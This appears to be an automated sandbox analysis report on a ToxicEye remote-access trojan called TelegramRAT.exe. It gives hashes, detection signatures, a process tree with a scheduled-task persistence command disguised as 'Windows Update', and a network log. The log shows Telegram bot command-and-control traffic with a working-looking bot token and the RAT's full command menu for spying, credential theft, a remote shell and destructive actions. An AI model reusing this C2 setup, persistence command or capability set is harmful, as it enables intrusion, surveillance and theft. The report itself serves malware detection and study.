Analysis

  • max time kernel
    95s
  • max time network
    98s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-07-2024 13:19

General

  • Target

    TelegramRAT.exe

  • Size

    111KB

  • MD5

    3c6f5e7ca1f0279c860554b7b4dfaf5d

  • SHA1

    15c4baaa666353eb7dd5d28a76aead8bf14bc352

  • SHA256

    f7514a2e0e612b0b4211c4655fedc3a7052578f38f1bfe131e2213102c164e34

  • SHA512

    1c8ac972d4ef27ec0f80e850137a8f19c95c72b97f2dede9c4d0caf007709133a5f2e248f6f04bc6e30fbbea742b8f4ae66a4f3408ab0d00ca48c48865947b09

  • SSDEEP

    1536:l+b6QDWv5IDlOM91qQIwy3xZxdyyKDWfybhDqI6oQWVzCrAZuW5TDx:Ib2IpOLhZxjQbxqHoQWVzCrAZuWRx

Score
10/10

Malware Config

Extracted

Family

toxiceye

C2

https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319

Signatures

  • ToxicEye

    ToxicEye is a trojan written in C#.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe
    "C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Windows Update" /tr "C:\Users\Public\Downloads\dupe.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4344
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp91A1.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp91A1.tmp.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\system32\tasklist.exe
        Tasklist /fi "PID eq 1644"
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3332
      • C:\Windows\system32\find.exe
        find ":"
        3⤵
          PID:4440
        • C:\Windows\system32\timeout.exe
          Timeout /T 1 /Nobreak
          3⤵
          • Delays execution with timeout.exe
          PID:1964
        • C:\Users\Public\Downloads\dupe.exe
          "dupe.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3456
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Windows Update" /tr "C:\Users\Public\Downloads\dupe.exe"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2776

    Network

    • flag-us
      DNS
      81.144.22.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      81.144.22.2.in-addr.arpa
      IN PTR
      Response
      81.144.22.2.in-addr.arpa
      IN PTR
      a2-22-144-81deploystaticakamaitechnologiescom
    • flag-us
      DNS
      154.239.44.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      154.239.44.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.dual-a-0034.a-msedge.net
      g-bing-com.dual-a-0034.a-msedge.net
      IN CNAME
      dual-a-0034.a-msedge.net
      dual-a-0034.a-msedge.net
      IN A
      13.107.21.237
      dual-a-0034.a-msedge.net
      IN A
      204.79.197.237
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=
      Remote address:
      13.107.21.237:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=0D77D67D512A6D7C1D34C2BD50CA6C38; domain=.bing.com; expires=Tue, 12-Aug-2025 13:19:28 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: F9C3A6AFE3DF4CF68FE9BD4F1F8C5833 Ref B: LON04EDGE1008 Ref C: 2024-07-18T13:19:28Z
      date: Thu, 18 Jul 2024 13:19:27 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=
      Remote address:
      13.107.21.237:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=0D77D67D512A6D7C1D34C2BD50CA6C38
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=AI0qDoJNEo8O1iIScw3Zn9OdJf0WbtoleZJbbTpcNwo; domain=.bing.com; expires=Tue, 12-Aug-2025 13:19:28 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 692F83E9FFD1493C96C56EB6186B1923 Ref B: LON04EDGE1008 Ref C: 2024-07-18T13:19:28Z
      date: Thu, 18 Jul 2024 13:19:27 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=
      Remote address:
      13.107.21.237:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=0D77D67D512A6D7C1D34C2BD50CA6C38; MSPTC=AI0qDoJNEo8O1iIScw3Zn9OdJf0WbtoleZJbbTpcNwo
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 5BACEA468FA240989B5298F9DBD7D198 Ref B: LON04EDGE1008 Ref C: 2024-07-18T13:19:28Z
      date: Thu, 18 Jul 2024 13:19:28 GMT
    • flag-us
      DNS
      237.21.107.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      237.21.107.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      88.156.103.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      88.156.103.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      google.com
      dupe.exe
      Remote address:
      8.8.8.8:53
      Request
      google.com
      IN A
      Response
      google.com
      IN A
      142.250.200.46
    • flag-us
      DNS
      api.telegram.org
      dupe.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
      Response
      api.telegram.org
      IN A
      149.154.167.220
    • flag-us
      DNS
      api.telegram.org
      dupe.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%F0%9F%8D%80%20Bot%20connected
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%F0%9F%8D%80%20Bot%20connected HTTP/1.1
      Host: api.telegram.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:36 GMT
      Content-Type: application/json
      Content-Length: 304
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:36 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=1
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=1 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:37 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=2
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=2 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:38 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=3
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=3 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:39 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=4
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=4 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:41 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=5
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=5 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:42 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=6
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=6 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:43 GMT
      Content-Type: application/json
      Content-Length: 413
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:43 GMT
      Content-Type: application/json
      Content-Length: 4991
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628332
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628332 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:44 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628333
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628333 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:45 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:46 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:47 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:48 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:49 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:50 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:52 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340 HTTP/1.1
